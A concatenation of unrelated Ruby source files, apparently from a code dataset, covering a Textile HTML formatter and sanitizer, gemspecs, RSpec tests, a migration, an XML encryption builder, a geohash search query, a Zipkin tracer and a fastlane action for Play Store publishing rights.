while text !~ /^ {#{indt}}\S/
indt += 1
end unless text.empty?
if indt.nonzero?
text.gsub!( /^ {#{indt}}/, '' )
end
end
end
def footnote_ref( text )
text.gsub!( /\[([0-9]{1,2}?)\](\s)?/,
'<sup><a href="#fn\1">\1</a></sup>\2' )
end
OFFTAGS = /(code|pre|kbd|notextile)/
OFFTAG_MATCH = /(?:(<\/#{ OFFTAGS }>)|(<#{ OFFTAGS }[^>]*>))(.*?)(?=<\/?#{ OFFTAGS }|\Z)/mi
OFFTAG_OPEN = /<#{ OFFTAGS }/
OFFTAG_CLOSE = /<\/?#{ OFFTAGS }/
HASTAG_MATCH = /(<\/?\w[^\n]*?>)/m
ALLTAG_MATCH = /(<\/?\w[^\n]*?>)|.*?(?=<\/?\w[^\n]*?>|$)/m
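    # Apply typographic glyphs and footnote references, recursing through
    # markup and only HTML-escaping content inside code/pre/kbd/notextile.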
def glyphs_textile( text, level = 0 )
if text !~ HASTAG_MATCH
pgl text
footnote_ref text
else
codepre = 0
text.gsub!( ALLTAG_MATCH ) do |line|
## matches are off if we're between <code>, <pre> etc.
if $1
if line =~ OFFTAG_OPEN
codepre += 1
elsif line =~ OFFTAG_CLOSE
codepre -= 1
codepre = 0 if codepre < 0
end
elsif codepre.zero?
glyphs_textile( line, level + 1 )
else
htmlesc( line, :NoQuotes )
end
# p [level, codepre, line]
line
end
end
end
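    # Lift code/pre/kbd/notextile blocks out of the text into @pre_list,
    # leaving <redpre#n> placeholders so later passes cannot mangle them;
    # smooth_offtags puts them back.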
def rip_offtags( text )
if text =~ /<.*>/
## strip and encode <pre> content
codepre, used_offtags = 0, {}
text.gsub!( OFFTAG_MATCH ) do |line|
if $3
offtag, aftertag = $4, $5
codepre += 1
used_offtags[offtag] = true
if codepre - used_offtags.length > 0
htmlesc( line, :NoQuotes ) unless used_offtags['notextile']
@pre_list.last << line
line = ""
else
htmlesc( aftertag, :NoQuotes ) if aftertag and not used_offtags['notextile']
line = "<redpre##{ @pre_list.length }>"
@pre_list << "#{ $3 }#{ aftertag }"
end
elsif $1 and codepre > 0
if codepre - used_offtags.length > 0
htmlesc( line, :NoQuotes ) unless used_offtags['notextile']
@pre_list.last << line
line = ""
end
codepre -= 1 unless codepre.zero?
used_offtags = {} if codepre.zero?
end
line
end
end
text
end
def smooth_offtags( text )
unless @pre_list.empty?
## replace <pre> content
text.gsub!( /<redpre#(\d+)>/ ) { @pre_list[$1.to_i] }
end
end
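    # Run every inline_* rule, then every glyphs_* rule, over the text.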
def inline( text )
[/^inline_/, /^glyphs_/].each do |meth_re|
@rules.each do |rule_name|
method( rule_name ).call( text ) if rule_name.to_s.match( meth_re )
end
end
end
def h_align( text )
H_ALGN_VALS[text]
end
def v_align( text )
V_ALGN_VALS[text]
end
def textile_popup_help( name, windowW, windowH )
' <a target="_blank" href="http://hobix.com/textile/#' + helpvar + '" onclick="window.open(this.href, \'popupwindow\', \'width=' + windowW + ',height=' + windowH + ',scrollbars,resizable\'); return false;">' + name + '</a><br />'
end
# HTML cleansing stuff
BASIC_TAGS = {
'a' => ['href', 'title'],
'img' => ['src', 'alt', 'title'],
'br' => [],
'i' => nil,
'u' => nil,
'b' => nil,
'pre' => nil,
'kbd' => nil,
'code' => ['lang'],
'cite' => nil,
'strong' => nil,
'em' => nil,
'ins' => nil,
'sup' => nil,
'sub' => nil,
'del' => nil,
'table' => nil,
'tr' => nil,
'td' => ['colspan', 'rowspan'],
'th' => nil,
'ol' => nil,
'ul' => nil,
'li' => nil,
'p' => nil,
'h1' => nil,
'h2' => nil,
'h3' => nil,
'h4' => nil,
'h5' => nil,
'h6' => nil,
'blockquote' => ['cite']
}
def clean_html( text, tags = BASIC_TAGS )
text.gsub!( /<!\[CDATA\[/, '' )
text.gsub!( /<(\/*)(\w+)([^>]*)>/ ) do
raw = $~
tag = raw[2].downcase
if tags.has_key? tag
pcs = [tag]
tags[tag].each do |prop|
['"', "'", ''].each do |q|
q2 = ( q != '' ? q : '\s' )
if raw[3] =~ /#{prop}\s*=\s*#{q}([^#{q2}]+)#{q}/i
attrv = $1
next if prop == 'src' and attrv =~ %r{^(?!http)\w+:}
pcs << "#{prop}=\"#{$1.gsub('"', '\\"')}\""
break
end
end
end if tags[tag]
"<#{raw[1]}#{pcs.join " "}>"
else
" "
end
end
end
end
| 31.721977 | 237 | 0.447261 |
28220f7ecedc306f2dc5cf20b702c1253b93d22c | 1,296 | # -*- encoding: utf-8 -*-
# stub: jekyll-theme-architect 0.1.0 ruby lib
Gem::Specification.new do |s|
s.name = "jekyll-theme-architect".freeze
s.version = "0.1.0"
s.required_rubygems_version = Gem::Requirement.new(">= 0".freeze) if s.respond_to? :required_rubygems_version=
s.require_paths = ["lib".freeze]
s.authors = ["Jason Long".freeze, "GitHub, Inc.".freeze]
s.date = "2017-08-14"
s.email = ["[email protected]".freeze]
s.homepage = "https://github.com/pages-themes/architect".freeze
s.licenses = ["CC0-1.0".freeze]
s.rubygems_version = "2.7.7".freeze
s.summary = "Architect is a Jekyll theme for GitHub Pages".freeze
s.installed_by_version = "2.7.7" if s.respond_to? :installed_by_version
if s.respond_to? :specification_version then
s.specification_version = 4
if Gem::Version.new(Gem::VERSION) >= Gem::Version.new('1.2.0') then
s.add_runtime_dependency(%q<jekyll>.freeze, ["~> 3.5"])
s.add_runtime_dependency(%q<jekyll-seo-tag>.freeze, ["~> 2.0"])
else
s.add_dependency(%q<jekyll>.freeze, ["~> 3.5"])
s.add_dependency(%q<jekyll-seo-tag>.freeze, ["~> 2.0"])
end
else
s.add_dependency(%q<jekyll>.freeze, ["~> 3.5"])
s.add_dependency(%q<jekyll-seo-tag>.freeze, ["~> 2.0"])
end
end
| 37.028571 | 112 | 0.665895 |
4a3591bfdb3ec4ff1355e256c5eeaa410afcab12 | 1,516 | # frozen_string_literal: true
RSpec.describe YoutubeAudio::Format do
let(:response_raw) do
JSON.parse(
{ # url=mock&s=mock-signature&sp=sig
mimeType: 'audio/mp4',
approxDurationMs: '1000',
audioQuality: 'low',
url: 'url-mock'
}.to_json
)
end
subject { described_class.new(response_raw, script_player_url: 'mock') }
describe '#mime_type' do
it { expect(subject.mime_type).to eq('audio/mp4') }
end
describe '#approx_duration_ms' do
it { expect(subject.approx_duration_ms).to eq('1000') }
end
describe '#audio_quality' do
it { expect(subject.audio_quality).to eq('low') }
end
describe '#url' do
it { expect(subject.url).to eq('url-mock') }
    it 'returns a URL with a signature' do
mock = instance_double(YoutubeAudio::UrlDecipher, decipher: 'decipher')
expect(subject).to receive(:cipher)
.twice
.and_return('url=mock&s=mock-signature&sp=sig')
expect(YoutubeAudio::UrlDecipher).to receive(:new)
.with('url=mock&s=mock-signature&sp=sig',
script_player_url: 'mock')
.and_return(mock)
expect(subject.url).to eq('decipher')
end
end
describe '#audio?' do
it 'returns true if the mime type is an audio' do
expect(subject.audio?).to eq(true)
end
it 'returns false if the mime type is not an audio' do
expect(subject).to receive(:mime_type).and_return('video/mp4')
expect(subject.audio?).to eq(false)
end
end
end
| 26.137931 | 77 | 0.64314 |
f70e6223224c2c24b86812da14abf08d69eebb6e | 1,953 | # frozen_string_literal: true
require 'spec_helper'
RSpec.describe ::AcaEntities::Contracts::People::PersonReferenceContract, dbclean: :after_each do
let!(:required_params) do
{
hbx_id: '1234',
first_name: 'first name',
last_name: 'last name',
middle_name: 'middle name',
dob: Date.today,
gender: 'male',
ssn: nil
}
end
context 'success case' do
before do
@result = subject.call(required_params)
end
it 'should return success' do
expect(@result.success?).to be_truthy
end
it 'should not have any errors' do
expect(@result.errors.empty?).to be_truthy
end
end
context 'when gender is nil' do
before do
@result = subject.call(required_params.merge(gender: nil))
end
it 'should return success' do
expect(@result.success?).to be_truthy
end
it 'should not have any errors' do
expect(@result.errors.empty?).to be_truthy
end
end
context 'failure case' do
context 'missing required param' do
before do
@result = subject.call(required_params.reject { |k, _v| k == :gender })
end
it 'should return failure' do
expect(@result.failure?).to be_truthy
end
      it 'should have errors' do
expect(@result.errors.empty?).to be_falsy
end
it 'should return error message' do
expect(@result.errors.messages.first.text).to eq('is missing')
end
end
context 'with bad input data type' do
before do
@result = subject.call(required_params.merge(first_name: nil))
end
it 'should return failure' do
expect(@result.failure?).to be_truthy
end
it 'should have any errors' do
expect(@result.errors.empty?).to be_falsy
end
it 'should return error message' do
expect(@result.errors.messages.first.text).to eq('must be a string')
end
end
end
end
| 22.976471 | 97 | 0.630824 |
18c67f05ff86b914e9915ad151ba3ebf11592d1a | 139 | class AddAwsMediaKeyToRecordings < ActiveRecord::Migration[6.0]
def change
add_column :recordings, :aws_media_key, :string
end
end
| 23.166667 | 63 | 0.776978 |
aca0bb1d794ced4166b728ea52ff1583f960cd63 | 7,318 | require 'spec_helper'
describe ProjectsHelper do
describe "#project_status_css_class" do
it "returns appropriate class" do
expect(project_status_css_class("started")).to eq("active")
expect(project_status_css_class("failed")).to eq("danger")
expect(project_status_css_class("finished")).to eq("success")
end
end
describe "can_change_visibility_level?" do
let(:project) { create(:project, :repository) }
let(:user) { create(:project_member, :reporter, user: create(:user), project: project).user }
let(:fork_project) { Projects::ForkService.new(project, user).execute }
it "returns false if there are no appropriate permissions" do
allow(helper).to receive(:can?) { false }
expect(helper.can_change_visibility_level?(project, user)).to be_falsey
end
it "returns true if there are permissions and it is not fork" do
allow(helper).to receive(:can?) { true }
expect(helper.can_change_visibility_level?(project, user)).to be_truthy
end
context "forks" do
it "returns false if there are permissions and origin project is PRIVATE" do
allow(helper).to receive(:can?) { true }
project.update visibility_level: Gitlab::VisibilityLevel::PRIVATE
expect(helper.can_change_visibility_level?(fork_project, user)).to be_falsey
end
it "returns true if there are permissions and origin project is INTERNAL" do
allow(helper).to receive(:can?) { true }
project.update visibility_level: Gitlab::VisibilityLevel::INTERNAL
expect(helper.can_change_visibility_level?(fork_project, user)).to be_truthy
end
end
end
describe "readme_cache_key" do
let(:project) { create(:project) }
before do
helper.instance_variable_set(:@project, project)
end
    it "returns a valid cache key" do
expect(helper.send(:readme_cache_key)).to eq("#{project.path_with_namespace}-#{project.commit.id}-readme")
end
it "returns a valid cache key if HEAD does not exist" do
allow(project).to receive(:commit) { nil }
expect(helper.send(:readme_cache_key)).to eq("#{project.path_with_namespace}-nil-readme")
end
end
describe 'link_to_member' do
let(:group) { create(:group) }
let(:project) { create(:empty_project, group: group) }
let(:user) { create(:user) }
describe 'using the default options' do
it 'returns an HTML link to the user' do
link = helper.link_to_member(project, user)
expect(link).to match(%r{/#{user.username}})
end
end
end
describe 'default_clone_protocol' do
context 'when user is not logged in and gitlab protocol is HTTP' do
it 'returns HTTP' do
allow(helper).to receive(:current_user).and_return(nil)
expect(helper.send(:default_clone_protocol)).to eq('http')
end
end
context 'when user is not logged in and gitlab protocol is HTTPS' do
it 'returns HTTPS' do
stub_config_setting(protocol: 'https')
allow(helper).to receive(:current_user).and_return(nil)
expect(helper.send(:default_clone_protocol)).to eq('https')
end
end
end
describe '#license_short_name' do
let(:project) { create(:empty_project) }
context 'when project.repository has a license_key' do
it 'returns the nickname of the license if present' do
allow(project.repository).to receive(:license_key).and_return('agpl-3.0')
expect(helper.license_short_name(project)).to eq('GNU AGPLv3')
end
it 'returns the name of the license if nickname is not present' do
allow(project.repository).to receive(:license_key).and_return('mit')
expect(helper.license_short_name(project)).to eq('MIT License')
end
end
context 'when project.repository has no license_key but a license_blob' do
it 'returns LICENSE' do
allow(project.repository).to receive(:license_key).and_return(nil)
expect(helper.license_short_name(project)).to eq('LICENSE')
end
end
end
describe '#sanitized_import_error' do
let(:project) { create(:project) }
before do
allow(project).to receive(:repository_storage_path).and_return('/base/repo/path')
end
it 'removes the repo path' do
repo = '/base/repo/path/namespace/test.git'
import_error = "Could not clone #{repo}\n"
expect(sanitize_repo_path(project, import_error)).to eq('Could not clone [REPOS PATH]/namespace/test.git')
end
end
describe '#last_push_event' do
let(:user) { double(:user, fork_of: nil) }
let(:project) { double(:project, id: 1) }
before do
allow(helper).to receive(:current_user).and_return(user)
helper.instance_variable_set(:@project, project)
end
context 'when there is no current_user' do
let(:user) { nil }
it 'returns nil' do
expect(helper.last_push_event).to eq(nil)
end
end
it 'returns recent push on the current project' do
event = double(:event)
expect(user).to receive(:recent_push).with([project.id]).and_return(event)
expect(helper.last_push_event).to eq(event)
end
context 'when current user has a fork of the current project' do
let(:fork) { double(:fork, id: 2) }
it 'returns recent push considering fork events' do
expect(user).to receive(:fork_of).with(project).and_return(fork)
event_on_fork = double(:event)
expect(user).to receive(:recent_push).with([project.id, fork.id]).and_return(event_on_fork)
expect(helper.last_push_event).to eq(event_on_fork)
end
end
end
describe "#project_feature_access_select" do
let(:project) { create(:empty_project, :public) }
let(:user) { create(:user) }
context "when project is internal or public" do
it "shows all options" do
helper.instance_variable_set(:@project, project)
result = helper.project_feature_access_select(:issues_access_level)
expect(result).to include("Disabled")
expect(result).to include("Only team members")
expect(result).to include("Everyone with access")
end
end
context "when project is private" do
before { project.update_attributes(visibility_level: Gitlab::VisibilityLevel::PRIVATE) }
it "shows only allowed options" do
helper.instance_variable_set(:@project, project)
result = helper.project_feature_access_select(:issues_access_level)
expect(result).to include("Disabled")
expect(result).to include("Only team members")
expect(result).not_to include("Everyone with access")
end
end
context "when project moves from public to private" do
before do
project.update_attributes(visibility_level: Gitlab::VisibilityLevel::PRIVATE)
end
it "shows the highest allowed level selected" do
helper.instance_variable_set(:@project, project)
result = helper.project_feature_access_select(:issues_access_level)
expect(result).to include("Disabled")
expect(result).to include("Only team members")
expect(result).not_to include("Everyone with access")
expect(result).to have_selector('option[selected]', text: "Only team members")
end
end
end
end
| 33.113122 | 112 | 0.680377 |
91321296f214d8946740f0763f4fc10ff8544ed5 | 925 | # frozen_string_literal: true
module CoEditPDF
# Policy to determine if an account can collaborate a particular pdf
class CollaborationRequestPolicy
def initialize(pdf, target_account, auth_scope = nil)
@pdf = pdf
@requestor_account = pdf.owner
@target_account = target_account
@auth_scope = auth_scope
@requestor = PdfPolicy.new(@requestor_account, @pdf, auth_scope)
@target = PdfPolicy.new(@target_account, @pdf, auth_scope)
end
def can_invite?
can_write? &&
(@requestor.can_add_collaborators? && @target.can_collaborate?)
end
def can_remove?
can_write? &&
(@requestor.can_remove_collaborators? && target_is_collaborator?)
end
private
def can_write?
@auth_scope ? @auth_scope.can_write?('pdf') : false
end
def target_is_collaborator?
@pdf.collaborators.include?(@target_account)
end
end
end
| 25.694444 | 73 | 0.685405 |
5de13b81e0b1f1b77dbb33735322cb6be5595434 | 1,766 | RSpec.feature "Partner management", type: :feature do
before do
sign_in(@user)
end
let!(:url_prefix) { "/#{@organization.to_param}" }
context "When a user views the index page" do
before(:each) do
@second = create(:partner, name: "Bcd")
@first = create(:partner, name: "Abc")
@third = create(:partner, name: "Cde")
visit url_prefix + "/partners"
end
scenario "the partner agency names are in alphabetical order" do
expect(page).to have_css("table tr", count: 4)
expect(page.find(:xpath, "//table/tbody/tr[1]/td[1]")).to have_content(@first.name)
expect(page.find(:xpath, "//table/tbody/tr[3]/td[1]")).to have_content(@third.name)
end
end
scenario "User can add a new partner" do
visit url_prefix + "/partners/new"
fill_in "Name", with: "Frank"
fill_in "E-mail", with: "[email protected]"
click_button "Save"
expect(page.find(".alert")).to have_content "added"
end
scenario "User creates a new partner with empty name" do
visit url_prefix + "/partners/new"
click_button "Save"
expect(page.find(".alert")).to have_content "didn't work"
end
scenario "User can update a partner" do
partner = create(:partner, name: "Frank")
visit url_prefix + "/partners/#{partner.id}/edit"
fill_in "Name", with: "Franklin"
click_button "Save"
expect(page.find(".alert")).to have_content "updated"
partner.reload
expect(partner.name).to eq("Franklin")
end
scenario "User updates a partner with empty name" do
partner = create(:partner, name: "Frank")
visit url_prefix + "/partners/#{partner.id}/edit"
fill_in "Name", with: ""
click_button "Save"
expect(page.find(".alert")).to have_content "didn't work"
end
end
| 30.982456 | 89 | 0.65402 |
622945431cc9f65b580927624208c9cd0cce0d5a | 1,430 | module Xmlenc
module Builder
class EncryptedData
include Xmlenc::Builder::ComplexTypes::EncryptedType
ALGORITHMS = {
'http://www.w3.org/2001/04/xmlenc#tripledes-cbc' => Algorithms::DES3CBC,
'http://www.w3.org/2001/04/xmlenc#aes128-cbc' => Algorithms::AESCBC[128],
'http://www.w3.org/2001/04/xmlenc#aes256-cbc' => Algorithms::AESCBC[256]
}
TYPES = {
'http://www.w3.org/2001/04/xmlenc#Element' => :element,
'http://www.w3.org/2001/04/xmlenc#Content' => :content,
}
tag "EncryptedData"
namespace "xenc"
attribute :id, String, tag: "Id"
attribute :type, String, tag: "Type"
def type
'http://www.w3.org/2001/04/xmlenc#Element'
end
def initialize(attributes = {})
super
self.id = SecureRandom.hex(5)
end
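      # Encrypt the data with the configured block cipher, store the Base64
      # ciphertext in this element, and return an EncryptedKey that carries the
      # session key and references this EncryptedData by id.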
def encrypt(data)
encryptor = algorithm.setup
encrypted = encryptor.encrypt(data, node: encryption_method)
cipher_data.cipher_value = Base64.encode64(encrypted)
encrypted_key = EncryptedKey.new(data: encryptor.key)
encrypted_key.add_data_reference(id)
encrypted_key
end
private
def algorithm
algorithm = encryption_method.algorithm
ALGORITHMS[algorithm] ||
raise(UnsupportedError.new("Unsupported encryption method #{algorithm}"))
end
end
end
end
| 28.039216 | 86 | 0.613986 |
26f3bfbcbc84fc1e843f4aa7fc99ad5190aa62be | 1,250 | # frozen_string_literal: true
require "active_record_unit"
class RelationCacheTest < ActionView::TestCase
tests ActionView::Helpers::CacheHelper
def setup
super
view_paths = ActionController::Base.view_paths
lookup_context = ActionView::LookupContext.new(view_paths, {}, ["test"])
@view_renderer = ActionView::Renderer.new(lookup_context)
@virtual_path = "path"
@current_template = lookup_context.find "test/hello_world"
controller.cache_store = ActiveSupport::Cache::MemoryStore.new
end
def test_cache_relation_other
assert_queries(1) do
cache(Project.all) { concat("Hello World") }
end
assert_equal "Hello World", controller.cache_store.read("views/test/hello_world:fa9482a68ce25bf7589b8eddad72f736/projects-#{Project.count}")
end
def view_cache_dependencies; []; end
def assert_queries(num)
ActiveRecord::Base.connection.materialize_transactions
count = 0
ActiveSupport::Notifications.subscribe("sql.active_record") do |_name, _start, _finish, _id, payload|
count += 1 unless ["SCHEMA", "TRANSACTION"].include? payload[:name]
end
result = yield
assert_equal num, count, "#{count} instead of #{num} queries were executed."
result
end
end
| 30.487805 | 144 | 0.732 |
ed4caad43e912a7183de6edc2d470d84f1259d7f | 6,043 | require 'spec_helper'
RSpec.describe NgrokAPI::Services::AgentIngressesClient do
let(:base_url) { 'https://api.ngrok.com' }
let(:path) { '/agent_ingresses' }
let(:not_found) do
NgrokAPI::Errors::NotFoundError.new(response: agent_ingress_result)
end
before(:each) do
@client = class_double("HttpClient")
@agent_ingresses_client = NgrokAPI::Services::AgentIngressesClient.new(client: @client)
end
describe "#create" do
it "will make a post request and return an instance of NgrokAPI::Models::AgentIngress" do
path = '/agent_ingresses'
replacements = {
}
data = {}
data[:description] = "New description"
data[:metadata] = "New metadata"
data[:domain] = "New domain"
expect(@client).to receive(:post).with(path % replacements, data: data).
and_return(agent_ingress_result)
result = @agent_ingresses_client.create(
description: "New description",
metadata: "New metadata",
domain: "New domain"
)
expect(result.class).to eq(NgrokAPI::Models::AgentIngress)
end
end
describe "#create!" do
it "will make a post request and return an instance of NgrokAPI::Models::AgentIngress" do
path = '/agent_ingresses'
replacements = {
}
data = {}
data[:description] = "New description"
data[:metadata] = "New metadata"
data[:domain] = "New domain"
expect(@client).to receive(:post).with(path % replacements, data: data).
and_return(agent_ingress_result)
result = @agent_ingresses_client.create(
description: "New description",
metadata: "New metadata",
domain: "New domain"
)
expect(result.class).to eq(NgrokAPI::Models::AgentIngress)
# expect(result.id).to eq(agent_ingress_result["id"])
end
end
describe "#delete" do
it "will make a delete request" do
path = '/agent_ingresses/%{id}'
replacements = {
id: api_key_result["id"],
}
expect(@client).to receive(:delete).with(path % replacements).and_return(nil)
@agent_ingresses_client.delete(
id: api_key_result["id"]
)
end
end
describe "#delete!" do
it "will make a delete request" do
path = '/agent_ingresses/%{id}'
replacements = {
id: api_key_result["id"],
}
expect(@client).to receive(:delete).with(path % replacements, danger: true).and_return(nil)
@agent_ingresses_client.delete!(
id: api_key_result["id"]
)
end
it "will make a delete request and return NotFoundError if 404" do
path = '/agent_ingresses/%{id}'
replacements = {
id: api_key_result["id"],
}
expect do
expect(@client).to receive(:delete).with(path % replacements, danger: true).
and_raise(NgrokAPI::Errors::NotFoundError)
result = @agent_ingresses_client.delete!(
id: api_key_result["id"]
)
expect(result).to be nil
end.to raise_error(NgrokAPI::Errors::NotFoundError)
end
end
describe "#get" do
it "will make a get request and return an instance of NgrokAPI::Models::AgentIngress" do
path = '/agent_ingresses/%{id}'
replacements = {
id: agent_ingress_result["id"],
}
data = {}
expect(@client).to receive(:get).with(path % replacements, data: data).
and_return(agent_ingress_result)
result = @agent_ingresses_client.get(
id: agent_ingress_result["id"]
)
expect(result.class).to eq(NgrokAPI::Models::AgentIngress)
end
end
describe "#get!" do
it "will make a get request and return an instance of NgrokAPI::Models::AgentIngress" do
path = '/agent_ingresses/%{id}'
replacements = {
id: agent_ingress_result["id"],
}
data = {}
expect(@client).to receive(:get).with(path % replacements, data: data).
and_return(agent_ingress_result)
result = @agent_ingresses_client.get(
id: agent_ingress_result["id"]
)
expect(result.class).to eq(NgrokAPI::Models::AgentIngress)
# expect(result.id).to eq(agent_ingress_result["id"])
end
end
describe "#list" do
it "will make a call to list (a GET request) and return a NgrokAPI::Models::Listable" do
expect(@client).to receive(:list).
and_return(agent_ingress_results)
url = base_url + path + "?before_id=" + api_key_result["id"] + "&limit=1"
result = @agent_ingresses_client.list(url: url)
expect(result.class).to eq(NgrokAPI::Models::Listable)
end
end
describe "#update" do
it "will make a patch request and return an instance of NgrokAPI::Models::AgentIngress" do
path = '/agent_ingresses/%{id}'
replacements = {
id: agent_ingress_result["id"],
}
data = {}
data[:description] = "New description"
data[:metadata] = "New metadata"
expect(@client).to receive(:patch).with(path % replacements, data: data).
and_return(agent_ingress_result)
result = @agent_ingresses_client.update(
id: agent_ingress_result["id"],
description: "New description",
metadata: "New metadata"
)
expect(result.class).to eq(NgrokAPI::Models::AgentIngress)
end
end
describe "#update!" do
it "will make a patch request and return an instance of NgrokAPI::Models::AgentIngress" do
path = '/agent_ingresses/%{id}'
replacements = {
id: agent_ingress_result["id"],
}
data = {}
data[:description] = "New description"
data[:metadata] = "New metadata"
expect(@client).to receive(:patch).with(path % replacements, data: data).
and_return(agent_ingress_result)
result = @agent_ingresses_client.update(
id: agent_ingress_result["id"],
description: "New description",
metadata: "New metadata"
)
expect(result.class).to eq(NgrokAPI::Models::AgentIngress)
# expect(result.id).to eq(agent_ingress_result["id"])
end
end
end
| 33.38674 | 97 | 0.634619 |
e2c52cf5aa3dcc5b5878b09dd872bed1f1755ecf | 190 | #!/usr/bin/ruby
# -*- coding: UTF-8 -*-
class Example
VAR1 = 100
VAR2 = 200
def show
      puts "The value of the first constant is #{VAR1}"
      puts "The value of the second constant is #{VAR2}"
end
end
# Create an object
object = Example.new
object.show | 12.666667 | 25 | 0.636842 |
ede61aaa3b68d4ad1b56cd23d428d722d0e99030 | 134 | class AddSeniorToUsers < ActiveRecord::Migration[5.0]
def change
add_column :users, :senior, :boolean, default: false
end
end
| 22.333333 | 56 | 0.738806 |
f8a9880ff5522a683925ff183ab7fbc6060d6546 | 577 | class CreateIteasykitIteasykitPlants < ActiveRecord::Migration[5.2]
def change
create_table :iteasykit_plants do |t|
t.boolean :active
t.timestamps
end
reversible do |dir|
dir.up do
Iteasykit::Plant.create_translation_table! :site => :string, :phone => :string, :address_map => :string, :geodanniye => :string,
:country => :string, :email => :string, :cordinates => :string
end
dir.down do
Iteasykit::Plant.drop_translation_table!
end
end
end
end
| 26.227273 | 136 | 0.589255 |
01110e9056a766cd3c9229731abcbd905e405273 | 1,184 | begin
require 'geohash'
rescue LoadError => e
require 'pr_geohash'
end
module Sunspot
module Query
class Geo
MAX_PRECISION = 12
DEFAULT_PRECISION = 7
DEFAULT_PRECISION_FACTOR = 16.0
def initialize(field, lat, lng, options)
@field, @options = field, options
@geohash = GeoHash.encode(lat.to_f, lng.to_f, MAX_PRECISION)
end
def to_params
{ :q => to_boolean_query }
end
def to_subquery
"(#{to_boolean_query})"
end
private
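      # OR together queries on successively shorter geohash prefixes, boosting
      # longer (more precise) prefixes exponentially harder.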
def to_boolean_query
queries = []
MAX_PRECISION.downto(precision) do |i|
star = i == MAX_PRECISION ? '' : '*'
precision_boost = Util.format_float(
boost * precision_factor ** (i-MAX_PRECISION).to_f, 3)
queries << "#{@field.indexed_name}:#{@geohash[0, i]}#{star}^#{precision_boost}"
end
queries.join(' OR ')
end
def precision
@options[:precision] || DEFAULT_PRECISION
end
def precision_factor
@options[:precision_factor] || DEFAULT_PRECISION_FACTOR
end
def boost
@options[:boost] || 1.0
end
end
end
end
| 21.925926 | 89 | 0.584459 |
f7d49acdbc6d6392fede05844c4b1ddccfe07c5f | 490 | # frozen_string_literal: true
module QueueHelper
private
def poll(queue, success = true)
test_order = []
queue.poll do |test|
yield test if block_given?
test_order << test
failed = !(success.respond_to?(:call) ? success.call(test) : success)
if failed
queue.report_failure!
queue.requeue(test) || queue.acknowledge(test)
else
queue.report_success!
queue.acknowledge(test)
end
end
test_order
end
end
| 22.272727 | 75 | 0.632653 |
e9ee2c86d0f28e46915dd82814ca363c128cda3f | 1,388 | # coding: utf-8
lib = File.expand_path('../lib', __FILE__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require 'openhouse/version'
Gem::Specification.new do |spec|
spec.name = 'openhouse'
spec.version = OpenHouse::VERSION
spec.date = '2017-06-20'
spec.authors = ['Eugenio Bruno']
spec.email = ['[email protected]']
spec.summary = 'OpenHouse simplifies implementing the Visitor design pattern.'
spec.homepage = 'https://github.com/eugeniobruno/openhouse'
spec.license = 'MIT'
spec.files = `git ls-files -z`.split("\x0").reject do |f|
f.match(%r{^(test|spec|features)/})
end
spec.bindir = 'bin'
spec.executables = spec.files.grep(%r{^exe/}) { |f| File.basename(f) }
spec.test_files = spec.files.grep(%r{^(test|spec|features)/})
spec.require_paths = ['lib']
spec.extra_rdoc_files = %w[LICENSE.txt README.md CODE_OF_CONDUCT.md CHANGELOG.md]
spec.required_ruby_version = '>= 2.0.0'
spec.add_development_dependency 'bundler', '~> 1.15'
spec.add_development_dependency 'rake', '~> 10.0'
spec.add_development_dependency 'minitest', '~> 5.0'
spec.add_development_dependency 'minitest-bender', '~> 0.0', '>= 0.0.2'
spec.add_development_dependency 'simplecov', '~> 0.14'
spec.add_development_dependency 'coveralls', '~> 0.8'
spec.add_development_dependency 'pry-byebug', '~> 3.4'
end
| 37.513514 | 83 | 0.678674 |
91719392e32204270c4b7d50eca587d705c63325 | 1,461 | require 'faraday'
module Trace
# This class is a base for tracers sending information to Zipkin.
# It knows about zipkin types of annotations and send traces when the server
# is done with its request
# Traces dealing with zipkin should inherit from this class and implement the
# flush! method which actually sends the information
class ZipkinTracerBase
def initialize(options={})
@options = options
reset
end
def with_new_span(trace_id, name)
span = start_span(trace_id, name)
result = yield span
end_span(span)
result
end
def end_span(span)
span.close
# If in a thread not handling incoming http requests, it will not have Kind::SERVER, so the span
# will never be flushed and will cause memory leak.
# If no parent span, then current span needs to flush when it ends.
if !span.has_parent_span? || span.kind == Trace::Span::Kind::SERVER
flush!
reset
end
end
def start_span(trace_id, name)
span = Span.new(name, trace_id)
span.local_endpoint = Trace.default_endpoint
store_span(trace_id, span)
span
end
def flush!
raise "not implemented"
end
private
THREAD_KEY = :zipkin_spans
def spans
Thread.current[THREAD_KEY] ||= []
end
def store_span(id, span)
spans.push(span)
end
def reset
Thread.current[THREAD_KEY] = []
end
end
end
| 23.190476 | 102 | 0.654346 |
396ef0909cf035e915e40472948806ff86031c30 | 5,680 | module Fastlane
module Actions
class GetManagedPlayStorePublishingRightsAction < Action
def self.run(params)
unless params[:json_key] || params[:json_key_data]
UI.important("To not be asked about this value, you can specify it using 'json_key'")
json_key_path = UI.input("The service account json file used to authenticate with Google: ")
json_key_path = File.expand_path(json_key_path)
UI.user_error!("Could not find service account json file at path '#{json_key_path}'") unless File.exist?(json_key_path)
params[:json_key] = json_key_path
end
FastlaneCore::PrintTable.print_values(
config: params,
mask_keys: [:json_key_data],
title: "Summary for get_managed_play_store_publishing_rights"
)
if (keyfile = params[:json_key])
json_key_data = File.open(keyfile, 'rb').read
else
json_key_data = params[:json_key_data]
end
# Login
credentials = JSON.parse(json_key_data)
callback_uri = 'https://fastlane.github.io/managed_google_play-callback/callback.html'
require 'addressable/uri'
continueUrl = Addressable::URI.encode(callback_uri)
uri = "https://play.google.com/apps/publish/delegatePrivateApp?service_account=#{credentials['client_email']}&continueUrl=#{continueUrl}"
UI.message("To obtain publishing rights for custom apps on Managed Play Store, open the following URL and log in:")
UI.message("")
UI.important(uri)
UI.message("([Cmd/Ctrl] + [Left click] lets you open this URL in many consoles/terminals/shells)")
UI.message("")
UI.message("After successful login you will be redirected to a page which outputs some information that is required for usage of the `create_app_on_managed_play_store` action.")
return uri
end
def self.description
"Obtain publishing rights for custom apps on Managed Google Play Store"
end
def self.authors
["janpio"]
end
def self.return_value
"An URI to obtain publishing rights for custom apps on Managed Play Store"
end
def self.details
[
          'If you haven\'t done so before, start by following the first two steps of Google\'s ["Get started with custom app publishing"](https://developers.google.com/android/work/play/custom-app-api/get-started) -> ["Preliminary setup"](https://developers.google.com/android/work/play/custom-app-api/get-started#preliminary_setup) instructions:',
